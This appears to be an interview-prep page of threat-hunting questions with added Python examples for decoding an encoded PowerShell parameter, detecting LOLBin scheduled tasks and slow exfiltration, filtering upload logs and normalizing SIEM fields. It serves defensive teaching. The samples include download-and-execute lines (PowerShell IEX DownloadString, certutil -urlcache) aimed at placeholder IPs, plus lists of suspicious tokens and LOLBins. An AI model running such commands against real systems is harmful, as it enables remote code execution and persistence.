InterviewStack.io

Log Analysis and Threat Hunting in Security Data Questions

Understand how to analyze security logs to identify suspicious activity. Know what different types of logs show (firewall, proxy, DNS, endpoint, application). Be able to correlate logs from multiple sources to trace attacker activity. Discuss threat hunting methodologies and how analysts proactively search for unknown threats in data.

Medium | Technical | 100 practiced
You find a base64-encoded PowerShell string in a proxy query parameter. Describe step-by-step how you would safely decode and analyze it, including safe analysis environment setup, static analysis steps, behavioral checks, and ways to hunt for other hosts exhibiting the same payload or command patterns.
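An added example of the static part of that workflow (written here for this question, not code from the original page). It assumes a constructed proxy URL whose `q` parameter carries what `powershell.exe -EncodedCommand` takes, i.e. UTF-16LE text encoded as base64; the command text, hostnames and IPs are made up. Nothing in it runs PowerShell: it decodes, triages indicators, and produces a fingerprint of the command skeleton (string literals and numbers abstracted away) that you can search for across other hosts' proxy or process logs even when the C2 URL or sleep interval differs.

```python
import base64
import hashlib
import re
from urllib.parse import unquote, urlsplit

# Constructed sample (not real traffic): the "q" parameter carries what
# powershell.exe -EncodedCommand expects, i.e. UTF-16LE text, base64 encoded.
_SAMPLE_CMD = ("IEX (New-Object Net.WebClient).DownloadString("
               "'http://198.51.100.23/stage2.ps1'); Start-Sleep 30")
SAMPLE_URL = ("http://intranet.example/api/check?id=7&q="
              + base64.b64encode(_SAMPLE_CMD.encode("utf-16le")).decode("ascii"))

# Substrings worth flagging in decoded PowerShell; extend from your own cases.
SUSPICIOUS_TOKENS = (
    "iex", "invoke-expression", "downloadstring", "downloadfile",
    "frombase64string", "-encodedcommand", "net.webclient",
    "invoke-webrequest", "bypass", "hidden", "start-process",
)


def extract_query_param(url: str, name: str) -> str:
    """Pull one query parameter without parse_qs(): parse_qs turns '+' into a
    space, which silently corrupts standard base64."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote(value)   # unquote(), not unquote_plus()
    raise KeyError(name)


def decode_blob(blob: str):
    """Decode base64 that may be URL-safe, unpadded, or '+'-mangled.
    Returns (text, encoding). Never executes anything."""
    s = re.sub(r"[\r\n\t]", "", blob).replace(" ", "+")   # a space is a mangled '+'
    s = s.replace("-", "+").replace("_", "/")              # URL-safe alphabet
    s += "=" * (-len(s) % 4)                               # restore padding
    raw = base64.b64decode(s)
    # -EncodedCommand is UTF-16LE: for ASCII text every odd byte is NUL.
    odd = raw[1::2]
    if odd and odd.count(0) * 2 > len(odd):
        return raw.decode("utf-16le", errors="replace"), "utf-16le"
    return raw.decode("utf-8", errors="replace"), "utf-8"


def extract_iocs(text: str) -> dict:
    """Static triage: network indicators plus dangerous cmdlets and switches."""
    lowered = text.lower()
    return {
        "urls": sorted(set(re.findall(r"https?://[^\s'\"()]+", text))),
        "ips": sorted(set(re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", text))),
        "tokens": [t for t in SUSPICIOUS_TOKENS if t in lowered],
    }


def command_fingerprint(text: str):
    """Skeleton of the command with string literals and numbers abstracted away,
    plus a short hash of it. Hosts whose decoded commands share the hash ran the
    same tooling even if the C2 URL or the sleep interval differs."""
    skeleton = re.sub(r"'[^']*'|\"[^\"]*\"", "'<str>'", text)
    skeleton = re.sub(r"\b\d+\b", "<n>", skeleton)
    skeleton = re.sub(r"\s+", " ", skeleton).strip().lower()
    return skeleton, hashlib.sha256(skeleton.encode()).hexdigest()[:16]


def analyze_proxy_url(url: str, param: str) -> dict:
    """Full static pipeline for one proxy-log URL. Run it on a copy of the log in
    an isolated analysis VM; behavioural checks (detonating the script, watching
    DNS/HTTP and child processes) belong in a sandbox, not here."""
    blob = extract_query_param(url, param)
    command, encoding = decode_blob(blob)
    skeleton, fp = command_fingerprint(command)
    return {"encoding": encoding, "command": command, "iocs": extract_iocs(command),
            "skeleton": skeleton, "fingerprint": fp}


if __name__ == "__main__":
    for key, value in analyze_proxy_url(SAMPLE_URL, "q").items():
        print(f"{key}: {value}")
```

The two traps the code guards against are the ones that most often break a manual decode: query-string parsers that turn `+` into a space, and forgetting that `-EncodedCommand` payloads are UTF-16LE (a UTF-8 decode yields NUL-separated characters). For hunting, search proxy and command-line telemetry for the fingerprint's skeleton rather than the literal URL, and pivot on the extracted IPs and hostnames in DNS and firewall logs.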
Hard | Technical | 79 practiced
A sophisticated attacker uses living-off-the-land binaries and scripts (LOLBAS) and scheduled tasks to persist on endpoints and exfiltrates slowly via small periodic uploads. Draft a comprehensive threat-hunting plan: hypotheses, required telemetry, analytic detections (including anomaly baselines), containment procedures, and how you'd measure hunt success.
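An added example of two of the analytics such a plan would contain (written for this question, not code from the original page). It runs over constructed endpoint process-creation and proxy events; the hostnames, destinations, LOLBin list and thresholds are assumptions to tune against your own telemetry. The first analytic tests the persistence hypothesis (schtasks /create whose action is a LOLBin); the second tests the slow-exfiltration hypothesis by measuring how regular the gaps between a host's small POSTs to one destination are, with destination rarity as the baseline; the last step joins the two so the hosts that match both go to containment first.

```python
from collections import defaultdict
from statistics import mean, median, pstdev

# LOLBins commonly launched from a scheduled task; extend from the LOLBAS project.
LOLBINS = {"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe", "bitsadmin.exe",
           "wscript.exe", "cscript.exe", "msiexec.exe", "powershell.exe"}

# Constructed endpoint process-creation events (not real telemetry).
PROCESS_EVENTS = [
    {"ts": 1700000000, "host": "ws-042", "user": "jdoe", "image": "schtasks.exe",
     "cmdline": 'schtasks /create /sc minute /mo 10 /tn "Updater" '
                '/tr "certutil.exe -urlcache -split -f http://203.0.113.9/u.txt"'},
    {"ts": 1700000300, "host": "ws-017", "user": "SYSTEM", "image": "schtasks.exe",
     "cmdline": 'schtasks /create /sc daily /tn "Backup" /tr "C:\\Tools\\backup.exe"'},
    {"ts": 1700000400, "host": "ws-042", "user": "jdoe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c dir"},
]


def _uploads(host, dst, offsets, sizes, base=1700000000):
    return [{"ts": base + o, "host": host, "dst": dst, "method": "POST", "bytes_out": s}
            for o, s in zip(offsets, sizes)]


# Constructed proxy events: ws-042 posts ~4 KB to one destination every ~10 minutes
# (a slow-drip beacon); ws-017 uploads irregular sizes at irregular times.
PROXY_EVENTS = (
    _uploads("ws-042", "files.example-cdn.net",
             [0, 603, 1198, 1805, 2396, 3001, 3602],
             [4096, 4146, 4196, 4096, 4146, 4196, 4096])
    + _uploads("ws-017", "sharepoint.example",
               [0, 140, 900, 910, 3000, 3300, 7200],
               [120000, 3500, 2200000, 800, 45000, 10200, 600000])
)


def lolbin_task_creations(events):
    """Hypothesis 1: persistence via schtasks /create whose action is a LOLBin."""
    hits = []
    for e in events:
        cmd = e["cmdline"].lower()
        if e["image"].lower() != "schtasks.exe" or "/create" not in cmd:
            continue
        found = sorted(b for b in LOLBINS if b in cmd)
        if found:
            hits.append({"host": e["host"], "user": e["user"], "lolbins": found,
                         "cmdline": e["cmdline"]})
    return hits


def periodic_uploads(events, min_events=6, max_interval_cv=0.2, max_median_bytes=65536):
    """Hypothesis 2: slow exfiltration looks like many small POST/PUTs from one host to
    one destination at near-constant intervals. The coefficient of variation (CV) of the
    inter-request gaps is the regularity measure; how many hosts talk to the destination
    at all is the baseline (one host alone is far more suspicious than hundreds)."""
    by_pair, hosts_per_dst = defaultdict(list), defaultdict(set)
    for e in events:
        if e["method"] in ("POST", "PUT"):
            by_pair[(e["host"], e["dst"])].append(e)
            hosts_per_dst[e["dst"]].add(e["host"])
    findings = []
    for (host, dst), evs in by_pair.items():
        if len(evs) < min_events:
            continue
        evs.sort(key=lambda e: e["ts"])
        gaps = [b["ts"] - a["ts"] for a, b in zip(evs, evs[1:])]
        sizes = [e["bytes_out"] for e in evs]
        cv = pstdev(gaps) / mean(gaps) if mean(gaps) > 0 else 0.0
        if cv <= max_interval_cv and median(sizes) <= max_median_bytes:
            findings.append({"host": host, "dst": dst, "count": len(evs),
                             "period_s": round(mean(gaps)), "interval_cv": round(cv, 3),
                             "total_bytes": sum(sizes),
                             "hosts_seen_at_dst": len(hosts_per_dst[dst])})
    return findings


def correlate(task_hits, upload_findings):
    """Hosts with both a LOLBin scheduled task and a periodic-upload pattern go to
    containment first (isolate, export the task XML, capture the beaconing process)."""
    return sorted({h["host"] for h in task_hits} & {f["host"] for f in upload_findings})


if __name__ == "__main__":
    tasks = lolbin_task_creations(PROCESS_EVENTS)
    drips = periodic_uploads(PROXY_EVENTS)
    print("LOLBin scheduled tasks:", tasks)
    print("Periodic small uploads:", drips)
    print("Hosts to contain first:", correlate(tasks, drips))
```

Measuring the hunt: record how many hypotheses were tested, how many findings each analytic produced and how many were confirmed, and which of the confirmed patterns were turned into standing detections; the CV threshold and the rarity baseline here are the two knobs you would calibrate on a week of known-good proxy data before trusting the alert volume.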
Medium | Technical | 93 practiced
Describe the structure and logic of a short Python script that reads newline-delimited JSON logs (large files), extracts events where 'user' != 'system' and 'action' == 'file_upload' and 'size_bytes' > 10485760 (10 MiB), and outputs a CSV with host, user, filename, size and timestamp. Explain performance considerations and how you'd modify it for streaming data.
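An added example of such a script (written for this question, not code from the original page). The NDJSON sample is constructed and deliberately includes the cases that break naive versions: a line that can be rejected before JSON parsing, a line truncated mid-write (as happens at log rotation), a size stored as a string, and an event with no size at all. The same function serves batch files and a `tail -f` pipe because it never holds more than one line in memory.

```python
import csv
import io
import json
import sys
from typing import Iterable, Iterator

THRESHOLD = 10 * 1024 * 1024          # 10485760 bytes (10 MiB)
FIELDS = ["host", "user", "filename", "size_bytes", "timestamp"]

# Constructed NDJSON sample (not real logs).
SAMPLE_NDJSON = "\n".join([
    '{"timestamp":"2024-03-01T10:00:00Z","host":"ws-042","user":"jdoe","action":"file_upload","filename":"q1.zip","size_bytes":15728640}',
    '{"timestamp":"2024-03-01T10:00:05Z","host":"ws-042","user":"system","action":"file_upload","filename":"backup.tar","size_bytes":52428800}',
    '{"timestamp":"2024-03-01T10:01:00Z","host":"ws-017","user":"asmith","action":"file_upload","filename":"notes.txt","size_bytes":2048}',
    '{"timestamp":"2024-03-01T10:02:00Z","host":"ws-017","user":"asmith","action":"file_download","filename":"big.iso","size_bytes":734003200}',
    '{"timestamp":"2024-03-01T10:02:30Z","host":"ws-017","user":"asmith","action":"file_upload"',
    '{"timestamp":"2024-03-01T10:03:00Z","host":"srv-09","user":"bkim","action":"file_upload","filename":"db-dump.sql","size_bytes":"20971520"}',
    '{"timestamp":"2024-03-01T10:04:00Z","host":"srv-09","user":"bkim","action":"file_upload","filename":"x.bin"}',
]) + "\n"


def iter_events(lines: Iterable[str], stats: dict,
                must_contain: str = '"file_upload"') -> Iterator[dict]:
    """Yield one parsed object per line, holding only the current line in memory.
    Lines that cannot match are rejected by a cheap substring test before the much
    more expensive json.loads; malformed lines are counted and skipped, not fatal."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        if must_contain and must_contain not in line:
            stats["prefiltered"] += 1
            continue
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            stats["bad_lines"] += 1


def is_large_user_upload(ev: dict, threshold: int = THRESHOLD) -> bool:
    if ev.get("action") != "file_upload" or ev.get("user") == "system":
        return False
    try:
        return int(ev.get("size_bytes", 0)) > threshold   # tolerate numeric strings
    except (TypeError, ValueError):
        return False                                      # missing or junk size


def filter_to_csv(lines: Iterable[str], out, threshold: int = THRESHOLD) -> dict:
    """Stream matching events to `out` as CSV. Works unchanged on a file, on stdin
    or on a `tail -f` pipe because nothing is buffered beyond one line."""
    stats = {"parsed": 0, "matched": 0, "bad_lines": 0, "prefiltered": 0}
    writer = csv.DictWriter(out, fieldnames=FIELDS, extrasaction="ignore", lineterminator="\n")
    writer.writeheader()
    for ev in iter_events(lines, stats):
        stats["parsed"] += 1
        if is_large_user_upload(ev, threshold):
            writer.writerow({f: ev.get(f, "") for f in FIELDS})
            stats["matched"] += 1
    out.flush()
    return stats


def filter_string(ndjson: str, threshold: int = THRESHOLD):
    """Convenience wrapper for tests and small inputs: returns (csv_text, stats)."""
    out = io.StringIO()
    stats = filter_to_csv(io.StringIO(ndjson), out, threshold)
    return out.getvalue(), stats


if __name__ == "__main__":
    # python large_uploads.py events.ndjson   or   tail -F events.ndjson | python large_uploads.py
    src = open(sys.argv[1], encoding="utf-8", errors="replace") if len(sys.argv) > 1 else sys.stdin
    with src:
        print(filter_to_csv(src, sys.stdout), file=sys.stderr)
```

Performance comes from three choices: iterating the file object line by line instead of `readlines()`, rejecting non-candidate lines with a substring test before `json.loads`, and writing rows as they match rather than collecting them. For a live feed, the only change is the input: point it at stdin behind `tail -F` or a message-queue consumer that yields lines, and flush the writer per batch rather than per row if throughput matters more than latency.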
Easy | Technical | 74 practiced
In Splunk and Elasticsearch, what are sourcetypes (Splunk) or indices and mappings (Elasticsearch)? Explain why consistent parsing and field extraction are critical for effective threat hunting. Include consequences of poor parsing and examples of how you'd normalize fields across diverse data sources.
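An added example of what field normalization buys you (written for this question, not code from the original page or from Splunk or Elastic). It takes three constructed raw events, a firewall, a proxy and a DNS record for the same connection, each with its own field names and timestamp format, maps them onto one common schema (the dotted names follow ECS conventions but the schema itself is an assumption), and then runs the hunt's basic primitive, a pivot on `source.ip`. Against the raw events the pivot returns nothing, which is the concrete consequence of inconsistent parsing; against the normalized events it returns the full cross-source timeline.

```python
from datetime import datetime, timezone

# Constructed raw events from three sources (not real logs). Each names the same
# concepts differently (src / c_ip / client_ip, three timestamp formats), which is
# exactly what defeats a cross-source pivot when parsing is inconsistent.
RAW_EVENTS = [
    {"sourcetype": "fw", "ts": 1709287200, "src": "10.1.2.3", "dst": "203.0.113.9",
     "dport": 443, "act": "allow"},
    {"sourcetype": "proxy", "time": "01/Mar/2024:10:00:05 +0000", "c_ip": "10.1.2.3",
     "cs_username": "CORP\\jdoe", "cs_host": "Files.Example-CDN.net", "s_ip": "203.0.113.9",
     "sc_status": 200, "cs_method": "POST"},
    {"sourcetype": "dns", "@timestamp": "2024-03-01T09:59:58Z", "client_ip": "10.1.2.3",
     "query": "files.example-cdn.net.", "answer": "203.0.113.9", "rcode": "NOERROR"},
]


def _iso(dt: datetime) -> str:
    """One timestamp convention everywhere: UTC, ISO 8601, second resolution."""
    return dt.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")


def norm_fw(e):
    return {"@timestamp": _iso(datetime.fromtimestamp(e["ts"], tz=timezone.utc)),
            "source.ip": e["src"], "destination.ip": e["dst"],
            "destination.port": e["dport"], "event.action": e["act"].lower()}


def norm_proxy(e):
    dt = datetime.strptime(e["time"], "%d/%b/%Y:%H:%M:%S %z")
    user = e.get("cs_username") or ""
    return {"@timestamp": _iso(dt), "source.ip": e["c_ip"], "destination.ip": e.get("s_ip"),
            "destination.domain": e["cs_host"].lower(),
            "user.name": user.split("\\")[-1].lower() or None,   # drop the DOMAIN\ prefix
            "event.action": e["cs_method"].lower(),
            "http.response.status_code": int(e["sc_status"])}


def norm_dns(e):
    dt = datetime.fromisoformat(e["@timestamp"].replace("Z", "+00:00"))
    return {"@timestamp": _iso(dt), "source.ip": e["client_ip"],
            "dns.question.name": e["query"].rstrip(".").lower(),   # strip the trailing dot
            "dns.resolved_ip": e["answer"], "event.action": e["rcode"].lower()}


NORMALIZERS = {"fw": norm_fw, "proxy": norm_proxy, "dns": norm_dns}


def normalize(raw: dict) -> dict:
    """Map a raw event onto the common schema. Unknown sourcetypes are kept but
    flagged, so the parsing gap is visible instead of silently missing from searches."""
    fn = NORMALIZERS.get(raw.get("sourcetype"))
    if fn is None:
        return {"event.dataset": raw.get("sourcetype", "unknown"), "normalized": False, "raw": raw}
    out = fn(raw)
    out["event.dataset"] = raw["sourcetype"]
    out["normalized"] = True
    return out


def pivot(events, field, value):
    """The hunt primitive: every event, from any source, where field == value."""
    return sorted((e for e in events if e.get(field) == value), key=lambda e: e["@timestamp"])


def timeline(events, src_ip):
    return [(e["@timestamp"], e["event.dataset"], e["event.action"])
            for e in pivot(events, "source.ip", src_ip)]


if __name__ == "__main__":
    normalized = [normalize(e) for e in RAW_EVENTS]
    print("raw pivot hits:", len(pivot(RAW_EVENTS, "source.ip", "10.1.2.3")))
    print("normalized pivot hits:", len(pivot(normalized, "source.ip", "10.1.2.3")))
    for row in timeline(normalized, "10.1.2.3"):
        print(*row)
```

The same lesson applies in the SIEM itself: a Splunk sourcetype with a broken timestamp extraction or an Elasticsearch mapping that stores `source.ip` as `text` in one index and `ip` in another produces exactly this failure, a pivot that quietly returns a subset of the evidence. Normalizing case, trailing dots, domain prefixes and time zones at ingest is what makes a join across DNS, proxy and firewall data trustworthy.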
Medium | System Design | 100 practiced
Your SIEM is suffering from slow queries due to very high-cardinality fields and growing data volumes. Propose architectural and operational approaches to optimize storage and query performance without losing key hunting capabilities. Cover indexing strategies, hot/cold storage, rollups, and query-time optimizations.
